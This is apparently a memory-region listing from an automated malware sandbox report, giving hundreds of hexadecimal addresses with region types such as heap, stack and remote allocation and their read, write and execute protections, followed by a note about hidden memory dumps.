trusted library allocation
page read and write
2ED9000
trusted library allocation
page read and write
45A0000
heap
page read and write
F6E000
unkown
page execute read
2B10000
trusted library allocation
page read and write
7A2E000
heap
page read and write
23AD8DEE000
unkown
page read and write
13C7000
unkown
page read and write
66D3000
heap
page read and write
5B9E000
stack
page read and write
34A7000
trusted library allocation
page read and write
EF7DBFD000
stack
page read and write
181417A0000
heap
page read and write
3174000
heap
page read and write
5B8F000
stack
page read and write
27C6000
trusted library allocation
page read and write
168E000
stack
page read and write
6BB000
heap
page read and write
3174000
heap
page read and write
10CD000
unkown
page execute read
18172076000
unkown
page read and write
35C5000
trusted library allocation
page read and write
694000
heap
page read and write
495E000
stack
page read and write
23AAA8E0000
heap
page read and write
1814378C000
direct allocation
page read and write
3477000
trusted library allocation
page read and write
23AD8D5C000
unkown
page read and write
23AD820A000
heap
page read and write
3174000
heap
page read and write
31C5000
trusted library allocation
page read and write
2B44000
trusted library allocation
page read and write
23AD8D32000
trusted library allocation
page read and write
49E000
unkown
page readonly
18141690000
heap
page read and write
3197000
trusted library allocation
page read and write
6460000
trusted library allocation
page read and write
18143653000
direct allocation
page read and write
275E000
trusted library allocation
page read and write
32C3000
trusted library allocation
page read and write
11AF000
unkown
page read and write
23AA9B73000
direct allocation
page read and write
357E000
trusted library allocation
page read and write
4D0000
remote allocation
page execute and read and write
37C1000
trusted library allocation
page read and write
834E000
stack
page read and write
731E000
stack
page read and write
23AD8CF9000
trusted library allocation
page read and write
638000
heap
page read and write
3174000
heap
page read and write
280A000
trusted library allocation
page read and write
36AC000
trusted library allocation
page read and write
AB0000
trusted library allocation
page read and write
2F39000
trusted library allocation
page read and write
693000
heap
page read and write
DB6D000
stack
page read and write
26E0000
trusted library allocation
page read and write
7F1E000
stack
page read and write
2B49000
trusted library allocation
page read and write
5921000
unkown
page read and write
67A000
heap
page read and write
790000
heap
page read and write
459000
unkown
page readonly
26C1000
trusted library allocation
page read and write
D4C000
unkown
page execute read
23AA9B64000
direct allocation
page read and write
10A8000
unkown
page execute read
1814303B000
direct allocation
page read and write
1400000
heap
page read and write
18143D55000
heap
page read and write
2A50000
trusted library allocation
page read and write
276D000
trusted library allocation
page read and write
18143791000
direct allocation
page read and write
2F48000
trusted library allocation
page read and write
550E000
direct allocation
page read and write
5C17000
heap
page read and write
26DE000
trusted library allocation
page read and write
F8E000
unkown
page execute read
23AAA2D0000
direct allocation
page read and write
505000
unkown
page readonly
3791000
trusted library allocation
page read and write
764D000
stack
page read and write
23AD89F7000
trusted library allocation
page read and write
470000
unkown
page readonly
4CC000
unkown
page readonly
10E7000
trusted library allocation
page execute and read and write
5661000
unkown
page read and write
EC2000
unkown
page execute read
3174000
heap
page read and write
F37000
stack
page read and write
37A2000
trusted library allocation
page read and write
35E2000
trusted library allocation
page read and write
2985000
trusted library allocation
page read and write
2B2B000
trusted library allocation
page read and write
10F0000
heap
page read and write
23AAA550000
direct allocation
page read and write
69E000
heap
page read and write
11FF000
stack
page read and write
2ED0000
heap
page read and write
6AC000
heap
page read and write
10C0000
trusted library allocation
page read and write
3643000
trusted library allocation
page read and write
E04000
unkown
page execute read
18143014000
direct allocation
page read and write
32C9000
trusted library allocation
page read and write
F89000
unkown
page execute read
2992000
trusted library allocation
page read and write
3174000
heap
page read and write
23AA9B55000
direct allocation
page read and write
27C1000
trusted library allocation
page read and write
689000
heap
page read and write
23AD8A63000
trusted library allocation
page read and write
23AD8AA0000
trusted library allocation
page read and write
352F000
trusted library allocation
page read and write
23AD8CAE000
trusted library allocation
page read and write
328D000
trusted library allocation
page read and write
18143D50000
heap
page read and write
FCB000
unkown
page execute read
3404000
trusted library allocation
page read and write
35FD000
trusted library allocation
page read and write
2AF5000
trusted library allocation
page read and write
2B40000
trusted library allocation
page read and write
23AA82F5000
heap
page read and write
684000
heap
page read and write
5C54000
heap
page read and write
5663000
unkown
page read and write
3152000
trusted library allocation
page read and write
12F8000
heap
page read and write
23AD8D21000
trusted library allocation
page read and write
EE7000
unkown
page execute read
1817225E000
unkown
page read and write
2F6C000
stack
page read and write
29B3000
trusted library allocation
page read and write
361A000
trusted library allocation
page read and write
18142FF7000
direct allocation
page read and write
10D3000
trusted library allocation
page read and write
2735000
trusted library allocation
page read and write
11D0000
unkown
page write copy
400000
remote allocation
page execute and read and write
2EE1000
trusted library allocation
page read and write
DE0000
unkown
page execute read
35F9000
trusted library allocation
page read and write
3527000
trusted library allocation
page read and write
6A7000
heap
page read and write
2812000
trusted library allocation
page read and write
13F3000
trusted library allocation
page execute and read and write
23AAA35C000
direct allocation
page read and write
1814305D000
direct allocation
page read and write
D89000
unkown
page execute read
59A0000
heap
page read and write
161A000
trusted library allocation
page execute and read and write
3170000
heap
page read and write
28CD000
trusted library allocation
page read and write
268D000
trusted library allocation
page read and write
3808000
trusted library allocation
page read and write
78F7000
heap
page read and write
745E000
stack
page read and write
5830000
heap
page execute and read and write
3694000
trusted library allocation
page read and write
18143056000
direct allocation
page read and write
12FE000
heap
page read and write
11D7000
unkown
page write copy
26C5000
trusted library allocation
page read and write
33B3000
trusted library allocation
page read and write
3174000
heap
page read and write
23AA82A0000
heap
page read and write
23AD8D6B000
trusted library allocation
page read and write
3174000
heap
page read and write
23AD8DD4000
unkown
page read and write
23AD8A4C000
trusted library allocation
page read and write
16E0000
trusted library allocation
page read and write
4A11000
trusted library allocation
page read and write
E32000
unkown
page execute read
23AD8293000
heap
page read and write
669000
heap
page read and write
3174000
heap
page read and write
A30000
heap
page read and write
54F1000
trusted library allocation
page read and write
2760000
trusted library allocation
page read and write
3821000
trusted library allocation
page read and write
D7A000
unkown
page execute read
26A8000
trusted library allocation
page read and write
70EE000
heap
page read and write
27F5000
trusted library allocation
page read and write
2802000
trusted library allocation
page read and write
26C9000
trusted library allocation
page read and write
23AD8C6A000
trusted library allocation
page read and write
151A000
trusted library allocation
page read and write
36F3000
trusted library allocation
page read and write
10AA000
unkown
page execute read
28CB000
trusted library allocation
page read and write
4084000
trusted library allocation
page read and write
29EB000
trusted library allocation
page read and write
3580000
trusted library allocation
page read and write
23AD8299000
heap
page read and write
7D60000
trusted library allocation
page execute and read and write
1408000
heap
page read and write
32B2000
trusted library allocation
page read and write
2FFB000
trusted library allocation
page read and write
23AAA249000
direct allocation
page read and write
40D9000
trusted library allocation
page read and write
23AA80D9000
heap
page read and write
FB3000
unkown
page execute read
3772000
trusted library allocation
page read and write
28FC000
trusted library allocation
page read and write
23AAA239000
direct allocation
page read and write
23AA81A0000
heap
page read and write
57D000
unkown
page readonly
FD8000
unkown
page execute read
6550000
heap
page read and write
5530000
trusted library allocation
page read and write
3224000
heap
page read and write
181437A6000
direct allocation
page read and write
23AAA36D000
direct allocation
page read and write
18142F50000
direct allocation
page read and write
1220000
trusted library allocation
page read and write
4EDA000
heap
page read and write
23AD8800000
trusted library allocation
page read and write
582E000
stack
page read and write
FD1000
unkown
page execute read
1275000
heap
page read and write
268F000
trusted library allocation
page read and write
EF7D7FE000
stack
page read and write
23AAA117000
direct allocation
page read and write
2F41000
trusted library allocation
page read and write
ACA000
trusted library allocation
page execute and read and write
30BD000
trusted library allocation
page read and write
28AE000
trusted library allocation
page read and write
5B40000
heap
page read and write
1396000
unkown
page read and write
3174000
heap
page read and write
18145D0F000
heap
page read and write
BD8000
heap
page read and write
1207000
unkown
page read and write
3542000
trusted library allocation
page read and write
29B6000
trusted library allocation
page read and write
69B000
heap
page read and write
3601000
trusted library allocation
page read and write
3174000
heap
page read and write
23AD8C5E000
trusted library allocation
page read and write
333E000
heap
page read and write
23AD7920000
unkown
page read and write
23AAA361000
direct allocation
page read and write
32C1000
trusted library allocation
page read and write
3531000
trusted library allocation
page read and write
3729000
trusted library allocation
page read and write
5661000
unkown
page read and write
D4A0000
trusted library allocation
page read and write
7AB0000
heap
page read and write
11AF000
unkown
page write copy
691000
heap
page read and write
5370000
direct allocation
page read and write
23AD8C42000
trusted library allocation
page read and write
3800000
trusted library allocation
page read and write
4A4000
unkown
page readonly
FCD000
unkown
page execute read
2A19000
trusted library allocation
page read and write
23AA9AC7000
direct allocation
page read and write
335E000
trusted library allocation
page read and write
489B000
stack
page read and write
23AD8AB7000
trusted library allocation
page read and write
7ADFFC7000
stack
page read and write
50A8000
trusted library allocation
page read and write
271A000
trusted library allocation
page read and write
510000
unkown
page readonly
13BD000
unkown
page read and write
3417000
trusted library allocation
page read and write
29C8000
trusted library allocation
page read and write
2A79000
trusted library allocation
page read and write
3174000
heap
page read and write
121A000
unkown
page write copy
36F1000
trusted library allocation
page read and write
61D000
stack
page read and write
2EE0000
heap
page execute and read and write
26F7000
trusted library allocation
page read and write
295E000
trusted library allocation
page read and write
11E3000
unkown
page read and write
5740000
trusted library allocation
page execute and read and write
23AA9FD0000
heap
page read and write
23AD8C64000
trusted library allocation
page read and write
37BD000
trusted library allocation
page read and write
6AF000
heap
page read and write
23AD8A82000
trusted library allocation
page read and write
1061000
unkown
page execute read
14AE000
heap
page read and write
126E000
stack
page read and write
3224000
heap
page read and write
37C5000
trusted library allocation
page read and write
13E2000
unkown
page read and write
4A30000
trusted library allocation
page read and write
6595000
heap
page read and write
181437A3000
direct allocation
page read and write
36D6000
trusted library allocation
page read and write
1429000
heap
page read and write
FED000
unkown
page execute read
505F000
trusted library allocation
page read and write
53E000
unkown
page readonly
11EB000
unkown
page write copy
23AD821B000
heap
page read and write
3689000
trusted library allocation
page read and write
3368000
trusted library allocation
page read and write
373C000
trusted library allocation
page read and write
7993000
heap
page read and write
B80000
trusted library allocation
page execute and read and write
34F0000
trusted library allocation
page read and write
697000
heap
page read and write
5AC0000
trusted library allocation
page execute and read and write
2FAD000
stack
page read and write
5C40000
trusted library allocation
page read and write
816F000
trusted library allocation
page read and write
2FEE000
stack
page read and write
30D4000
trusted library allocation
page read and write
23AD8AFC000
trusted library allocation
page read and write
23AD8AE5000
trusted library allocation
page read and write
7814000
heap
page read and write
30F1000
trusted library allocation
page read and write
23AD8B31000
trusted library allocation
page read and write
33D0000
trusted library allocation
page read and write
11DE000
unkown
page write copy
18170EFC000
heap
page read and write
34C2000
trusted library allocation
page read and write
23AD8C6F000
trusted library allocation
page read and write
66BE000
heap
page read and write
7DDE000
stack
page read and write
5AAF000
trusted library allocation
page read and write
2CFC000
stack
page read and write
1216000
unkown
page write copy
23AD7D06000
heap
page read and write
2460000
heap
page read and write
370E000
trusted library allocation
page read and write
2750000
trusted library allocation
page read and write
13A3000
unkown
page read and write
785D000
heap
page read and write
23AD8D4F000
trusted library allocation
page read and write
23AD8D1B000
trusted library allocation
page read and write
23AD82CC000
heap
page read and write
380C000
trusted library allocation
page read and write
4C0000
unkown
page readonly
2B29000
trusted library allocation
page read and write
E5A000
unkown
page execute read
3453000
trusted library allocation
page read and write
B90000
trusted library allocation
page read and write
23AD8E0D000
unkown
page read and write
7C2D000
heap
page read and write
2998000
trusted library allocation
page read and write
2966000
trusted library allocation
page read and write
34C9000
trusted library allocation
page read and write
5C57000
heap
page read and write
23AAA2D7000
direct allocation
page read and write
76E000
stack
page read and write
23AD8D5C000
trusted library allocation
page read and write
2962000
trusted library allocation
page read and write
693000
heap
page read and write
23AD806D000
heap
page read and write
BF0000
heap
page read and write
50B1000
heap
page read and write
6560000
heap
page read and write
479B000
stack
page read and write
3DB000
stack
page read and write
2A77000
trusted library allocation
page read and write
31A8000
trusted library allocation
page read and write
2A41000
trusted library allocation
page read and write
6AD000
heap
page read and write
3687000
trusted library allocation
page read and write
23AD8AB0000
trusted library allocation
page read and write
272C000
trusted library allocation
page read and write
18170D00000
heap
page read and write
5010000
trusted library allocation
page execute and read and write
491B000
stack
page read and write
23AAA0D8000
direct allocation
page read and write
5BFA000
heap
page read and write
3578000
trusted library allocation
page read and write
3174000
heap
page read and write
B8B000
stack
page read and write
3610000
trusted library allocation
page read and write
6BE000
heap
page read and write
23AA9AC0000
direct allocation
page read and write
268B000
trusted library allocation
page read and write
36AA000
trusted library allocation
page read and write
23AA82F0000
heap
page read and write
33FE000
trusted library allocation
page read and write
5C1F000
heap
page read and write
782D000
heap
page read and write
5661000
unkown
page read and write
35AA000
trusted library allocation
page read and write
3829000
trusted library allocation
page read and write
5510000
trusted library allocation
page read and write
3364000
trusted library allocation
page read and write
F50000
unkown
page execute read
23AD8D15000
trusted library allocation
page read and write
2450000
trusted library allocation
page read and write
E89000
unkown
page execute read
7B8E000
heap
page read and write
1530000
heap
page read and write
1D7000
stack
page read and write
56E000
unkown
page readonly
5105000
heap
page read and write
31B4000
trusted library allocation
page read and write
16E4000
trusted library allocation
page read and write
370A000
trusted library allocation
page read and write
2FF1000
trusted library allocation
page read and write
23AD8CE2000
trusted library allocation
page read and write
329E000
trusted library allocation
page read and write
EF7D8FE000
stack
page read and write
1600000
trusted library allocation
page read and write
46EB000
stack
page read and write
4E0D000
stack
page read and write
137F000
stack
page read and write
23AD8A09000
unkown
page read and write
333E000
stack
page read and write
23AD8DC3000
unkown
page read and write
23AA9BC3000
direct allocation
page read and write
23AD827C000
heap
page read and write
23AD8AC6000
trusted library allocation
page read and write
2B23000
trusted library allocation
page read and write
5661000
unkown
page read and write
23AAA350000
direct allocation
page read and write
181417A5000
heap
page read and write
7FF4A1760000
direct allocation
page read and write
371F000
trusted library allocation
page read and write
5840000
heap
page read and write
586E000
stack
page read and write
796D000
heap
page read and write
32C7000
trusted library allocation
page read and write
2430000
trusted library allocation
page read and write
376E000
trusted library allocation
page read and write
AAD000
trusted library allocation
page execute and read and write
1230000
unkown
page write copy
339E000
trusted library allocation
page read and write
16F8000
trusted library allocation
page read and write
3174000
heap
page read and write
11E3000
unkown
page write copy
466C000
stack
page read and write
54FD000
trusted library allocation
page read and write
5B3E000
stack
page read and write
29E7000
trusted library allocation
page read and write
3174000
heap
page read and write
29C6000
trusted library allocation
page read and write
3659000
trusted library allocation
page read and write
4E1C000
heap
page read and write
29AF000
trusted library allocation
page read and write
544E000
direct allocation
page read and write
E95000
unkown
page execute read
64C9000
trusted library section
page readonly
30EB000
trusted library allocation
page read and write
2A5E000
trusted library allocation
page read and write
29E9000
trusted library allocation
page read and write
280E000
trusted library allocation
page read and write
37B9000
trusted library allocation
page read and write
23AD7A83000
heap
page read and write
630000
heap
page read and write
23AAA110000
direct allocation
page read and write
23AD80EA000
heap
page read and write
D40000
unkown
page readonly
2B31000
trusted library allocation
page read and write
28BA000
trusted library allocation
page read and write
59C000
unkown
page readonly
23AD8966000
trusted library allocation
page read and write
11B5000
unkown
page write copy
805E000
stack
page read and write
337F000
trusted library allocation
page read and write
4B5000
unkown
page readonly
2A92000
trusted library allocation
page read and write
29B1000
trusted library allocation
page read and write
29FE000
trusted library allocation
page read and write
BA0000
heap
page read and write
37C3000
trusted library allocation
page read and write
1622000
trusted library allocation
page read and write
46AE000
stack
page read and write
12BB000
heap
page read and write
23BE000
stack
page read and write
4A16000
trusted library allocation
page read and write
14BA000
heap
page read and write
2A71000
trusted library allocation
page read and write
26DA000
trusted library allocation
page read and write
1814300D000
direct allocation
page read and write
77C0000
heap
page read and write
23AD8C7B000
trusted library allocation
page read and write
5570000
heap
page read and write
3774000
trusted library allocation
page read and write
137A000
unkown
page read and write
23AAA0D0000
direct allocation
page read and write
2A84000
trusted library allocation
page read and write
281F000
trusted library allocation
page read and write
181414E0000
heap
page read and write
EF7D6F7000
stack
page read and write
4F0E000
stack
page read and write
289F000
trusted library allocation
page read and write
34A9000
trusted library allocation
page read and write
23AD8B13000
trusted library allocation
page read and write
23AD8AD6000
trusted library allocation
page read and write
3174000
heap
page read and write
3174000
heap
page read and write
2AA3000
trusted library allocation
page read and write
2739000
trusted library allocation
page read and write
13E7000
unkown
page read and write
23AD8D49000
trusted library allocation
page read and write
492000
unkown
page readonly
312A000
trusted library allocation
page read and write
25A0000
heap
page execute and read and write
3777000
trusted library allocation
page read and write
23AD8E2C000
unkown
page read and write
23AD8DF0000
unkown
page read and write
30DA000
trusted library allocation
page read and write
18171516000
heap
page read and write
1814159B000
heap
page read and write
6470000
heap
page read and write
4580000
heap
page read and write
3721000
trusted library allocation
page read and write
D6D000
unkown
page execute read
36A4000
trusted library allocation
page read and write
4CF9000
heap
page read and write
352F000
stack
page read and write
AF0000
trusted library allocation
page read and write
51C000
unkown
page readonly
5167000
trusted library allocation
page read and write
DD2000
unkown
page execute read
687000
heap
page read and write
283B000
trusted library allocation
page read and write
5520000
trusted library allocation
page execute and read and write
3174000
heap
page read and write
1070000
heap
page read and write
5820000
unkown
page read and write
3434000
trusted library allocation
page read and write
23AD8E1E000
unkown
page read and write
3174000
heap
page read and write
368F000
trusted library allocation
page read and write
49F4000
trusted library allocation
page read and write
18143679000
direct allocation
page read and write
3186000
trusted library allocation
page read and write
5039000
heap
page read and write
3135000
trusted library allocation
page read and write
23AA9B9F000
direct allocation
page read and write
10F5000
heap
page read and write
3742000
trusted library allocation
page read and write
18143500000
direct allocation
page read and write
3495000
trusted library allocation
page read and write
4DB7000
heap
page read and write
10B3000
unkown
page execute read
35AC000
trusted library allocation
page read and write
8160000
trusted library allocation
page read and write
4A20000
trusted library allocation
page read and write
D94000
unkown
page execute read
118F000
unkown
page execute read
691000
heap
page read and write
2790000
trusted library allocation
page read and write
6B1000
heap
page read and write
3174000
heap
page read and write
27AF000
trusted library allocation
page read and write
F22000
unkown
page execute read
23AD829E000
heap
page read and write
6A2000
heap
page read and write
23AD8AED000
trusted library allocation
page read and write
416F000
stack
page read and write
18141598000
heap
page read and write
4AF000
unkown
page readonly
DA1000
unkown
page execute read
7FF4A1700000
direct allocation
page read and write
181414F5000
heap
page read and write
7892000
heap
page read and write
23AD82B5000
heap
page read and write
599B000
stack
page read and write
AD7000
trusted library allocation
page execute and read and write
5A3E000
stack
page read and write
23AA8099000
heap
page read and write
EC0000
unkown
page execute read
291E000
trusted library allocation
page read and write
23AAA21B000
direct allocation
page read and write
160D000
trusted library allocation
page execute and read and write
5068000
heap
page read and write
23AD8A54000
trusted library allocation
page read and write
16EE000
trusted library allocation
page read and write
13F2000
unkown
page readonly
5937000
heap
page read and write
741F000
stack
page read and write
5661000
unkown
page read and write
26AE000
trusted library allocation
page read and write
26D6000
trusted library allocation
page read and write
23AD787E000
heap
page read and write
838E000
stack
page read and write
23AAA190000
direct allocation
page read and write
ECC000
unkown
page execute read
13BE000
stack
page read and write
1690000
trusted library allocation
page execute and read and write
5BE0000
heap
page read and write
35AE000
trusted library allocation
page read and write
6580000
trusted library allocation
page read and write
4059000
trusted library allocation
page read and write
23AAA223000
direct allocation
page read and write
35A8000
trusted library allocation
page read and write
3362000
trusted library allocation
page read and write
23AD7A80000
heap
page read and write
28D5000
trusted library allocation
page read and write
2A13000
trusted library allocation
page read and write
D71D000
stack
page read and write
3210000
heap
page read and write
59C7000
trusted library allocation
page read and write
3174000
heap
page read and write
1031000
unkown
page execute read
6AC000
heap
page read and write
23AD8CCB000
trusted library allocation
page read and write
686000
heap
page read and write
23AD828D000
heap
page read and write
378B000
trusted library allocation
page read and write
3174000
heap
page read and write
181437A8000
direct allocation
page read and write
A712000
trusted library allocation
page read and write
1198000
unkown
page execute read
6B6000
heap
page read and write
3438000
trusted library allocation
page read and write
256E000
stack
page read and write
5661000
unkown
page read and write
23AA80CD000
heap
page read and write
32E2000
trusted library allocation
page read and write
18141720000
direct allocation
page execute and read and write
23AD8A91000
trusted library allocation
page read and write
23AD8D6D000
unkown
page read and write
3685000
trusted library allocation
page read and write
577000
unkown
page readonly
2ADC000
trusted library allocation
page read and write
2947000
trusted library allocation
page read and write
2ED0000
trusted library allocation
page read and write
32E7000
heap
page read and write
78C4000
heap
page read and write
2F0E000
trusted library allocation
page read and write
314C000
trusted library allocation
page read and write
16D8000
heap
page read and write
10B7000
unkown
page execute read
412000
unkown
page readonly
2A5A000
trusted library allocation
page read and write
2983000
trusted library allocation
page read and write
4BA000
unkown
page readonly
3113000
trusted library allocation
page read and write
29CE000
trusted library allocation
page read and write
2B6E000
trusted library allocation
page read and write
67F000
heap
page read and write
18142F5E000
direct allocation
page read and write
2732000
trusted library allocation
page read and write
5661000
unkown
page read and write
1207000
trusted library allocation
page execute and read and write
10BA000
unkown
page execute read
23AD8B39000
trusted library allocation
page read and write
50A7000
heap
page read and write
11D9000
unkown
page write copy
23AD8E24000
unkown
page read and write
96F000
stack
page read and write
DE4000
unkown
page execute read
3174000
heap
page read and write
2943000
trusted library allocation
page read and write
34D9000
trusted library allocation
page read and write
23AA8280000
heap
page read and write
29E1000
trusted library allocation
page read and write
23AD8C00000
trusted library allocation
page read and write
66E2000
heap
page read and write
14E4000
heap
page read and write
2EBC000
stack
page read and write
348C000
trusted library allocation
page read and write
35C7000
trusted library allocation
page read and write
29DF000
trusted library allocation
page read and write
172A000
trusted library allocation
page read and write
18143508000
direct allocation
page read and write
35DE000
trusted library allocation
page read and write
2D3A000
stack
page read and write
544E000
stack
page read and write
23AA9BD1000
direct allocation
page read and write
4E8000
unkown
page readonly
23AD8E13000
unkown
page read and write
7889000
heap
page read and write
3174000
heap
page read and write
B3E000
stack
page read and write
45EE000
stack
page read and write
18143073000
direct allocation
page read and write
2AAB000
trusted library allocation
page read and write
68F000
heap
page read and write
378D000
trusted library allocation
page read and write
FE9000
unkown
page execute read
2899000
trusted library allocation
page read and write
35CB000
trusted library allocation
page read and write
292C000
trusted library allocation
page read and write
1625000
trusted library allocation
page execute and read and write
2AA5000
trusted library allocation
page read and write
23AA9BAD000
direct allocation
page read and write
23AA9BCA000
direct allocation
page read and write
D5D000
unkown
page execute read
28A3000
trusted library allocation
page read and write
2B25000
trusted library allocation
page read and write
1610000
trusted library allocation
page read and write
11FA000
unkown
page read and write
33A0000
trusted library allocation
page read and write
4B50000
heap
page read and write
78C0000
trusted library allocation
page read and write
23AD8CD6000
trusted library allocation
page read and write
23AD8CF3000
trusted library allocation
page read and write
2945000
trusted library allocation
page read and write
2AF7000
trusted library allocation
page read and write
18142F65000
direct allocation
page read and write
6570000
trusted library allocation
page execute and read and write
1312000
heap
page read and write
380E000
trusted library allocation
page read and write
23AA80E2000
heap
page read and write
AD5000
trusted library allocation
page execute and read and write
2F45000
trusted library allocation
page read and write
32E0000
heap
page read and write
18143798000
direct allocation
page read and write
23AD8D93000
unkown
page read and write
511E000
trusted library allocation
page read and write
687000
heap
page read and write
23AD8A17000
trusted library allocation
page read and write
2981000
trusted library allocation
page read and write
ABD000
trusted library allocation
page execute and read and write
3827000
trusted library allocation
page read and write
2A5C000
trusted library allocation
page read and write
23AD7890000
unkown
page read and write
35B1000
trusted library allocation
page read and write
100E000
stack
page read and write
FD4000
unkown
page execute read
18170D9D000
heap
page read and write
50B5000
heap
page read and write
CBF000
unkown
page read and write
18143033000
direct allocation
page read and write
1705000
trusted library allocation
page read and write
46A000
unkown
page readonly
23AD8D38000
trusted library allocation
page read and write
2570000
trusted library allocation
page read and write
FFF000
unkown
page execute read
4D7000
unkown
page readonly
26F1000
trusted library allocation
page read and write
310F000
stack
page read and write
BD0000
heap
page read and write
D5DD000
stack
page read and write
27DA000
trusted library allocation
page read and write
There are 1753 hidden memdumps, click here to show them.